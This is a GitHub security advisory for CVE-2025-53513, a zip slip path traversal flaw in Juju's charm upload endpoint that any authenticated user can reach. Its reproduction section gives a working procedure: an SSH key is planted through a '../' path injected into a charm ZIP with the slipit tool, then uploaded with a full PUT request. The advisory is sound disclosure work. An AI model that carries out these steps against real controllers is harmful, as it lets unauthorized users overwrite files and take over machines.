Skip to content

Juju zip slip vulnerability via authenticated endpoint

High severity GitHub Reviewed Published Jul 8, 2025 in juju/juju • Updated Jul 9, 2025

Package

gomod github.com/juju/juju (Go)

Affected versions

< 0.0.0-20250619215741-6356e984b82a

Patched versions

0.0.0-20250619215741-6356e984b82a

Description

Impact

Any user with a Juju account on a controller can upload a charm to the /charms endpoint.
No specific permissions are required - it's just sufficient for the user to exist in the controller user database.
A charm which exploits the zip slip vulnerability may be used to allow such a user to get access to a machine running a unit using the affected charm.

Details

A controller exposes three charm-related HTTP API endpoints, as follows:

  • PUT/GET https://:17070/model-/charms/-
  • POST/GET https://:17070/model-/charms
  • GET https://:17070/charms

These endpoints require Basic HTTP authentication credentials and will accept any valid user within the context of the controller. A user that has no specific permission or access granted can call all of these APIs.

To reproduce:

juju bootstrap
juju add-user testuser
juju change-user-password testuser

Download the ZIP file of an arbitrary charm eg https://github.com/juju/hello-juju-charm

Download and install the following tool: https://github.com/usdAG/slipit

Run the following command to generate a new SSH key pair: ssh-keygen

Copy the contents of the newly created public key into a file called authorized_keys

Run the following command to inject the malicious path into the ZIP file:

slipit hello.zip authorized_keys --separator ../../../../../../home/
ubuntu/.ssh/

Send the PUT request below to a model on the target controller. Note the following:

  • the model UUID and controller IP address in the request must be updated
  • the Juju-Curl header needs to be sent with a value that starts with the “local:” string
  • the PUT body content should have the exact contents of the ZIP file
  • the Basic Authorization header should be tied to the user that was created above
  • the first time that the request is sent, an error will be returned that states that the SHA hash in the URL is invalid. When this occurs, copy the value in the response and replace it in the final part of the URL (i.e. pathtw-<updated-sha>)
PUT /model-34bb5ef0-5a3e-41d7-873c-2f884adf606d/charms/pathtw-5c9f25c
HTTP/1.1
Host: 10.4.154.217:17070
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko
/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
Content-Length: 40021
Content-Type: application/zip
Juju-Curl: local:pathtw
Authorization: Basic dXNlci10ZXN0dXNlcjpwYXNzd29yZA==
<ZIP BODY Content>

Observe that the response states that the charm has been uploaded.

Attempt to SSH to the controller by using the private key that was generated above.

Observe that it is possible to authenticate because the file has been overwritten.

Code

The /charms handlers are registered here
https://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L897
https://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L990

And the only auth required is that the incoming request be for an authenticated user

https://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L754

but no specific permission checks are done.

Workarounds

There are no known workarounds.

References

F-02

References

@wallyworld wallyworld published to juju/juju Jul 8, 2025
Published by the National Vulnerability Database Jul 8, 2025
Published to the GitHub Advisory Database Jul 9, 2025
Reviewed Jul 9, 2025
Last updated Jul 9, 2025

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(27th percentile)

Weaknesses

Path Traversal: '../filedir'

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize ../ sequences that can resolve to a location that is outside of that directory. Learn more on MITRE.

CVE ID

CVE-2025-53513

GHSA ID

GHSA-24ch-w38v-xmh8

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.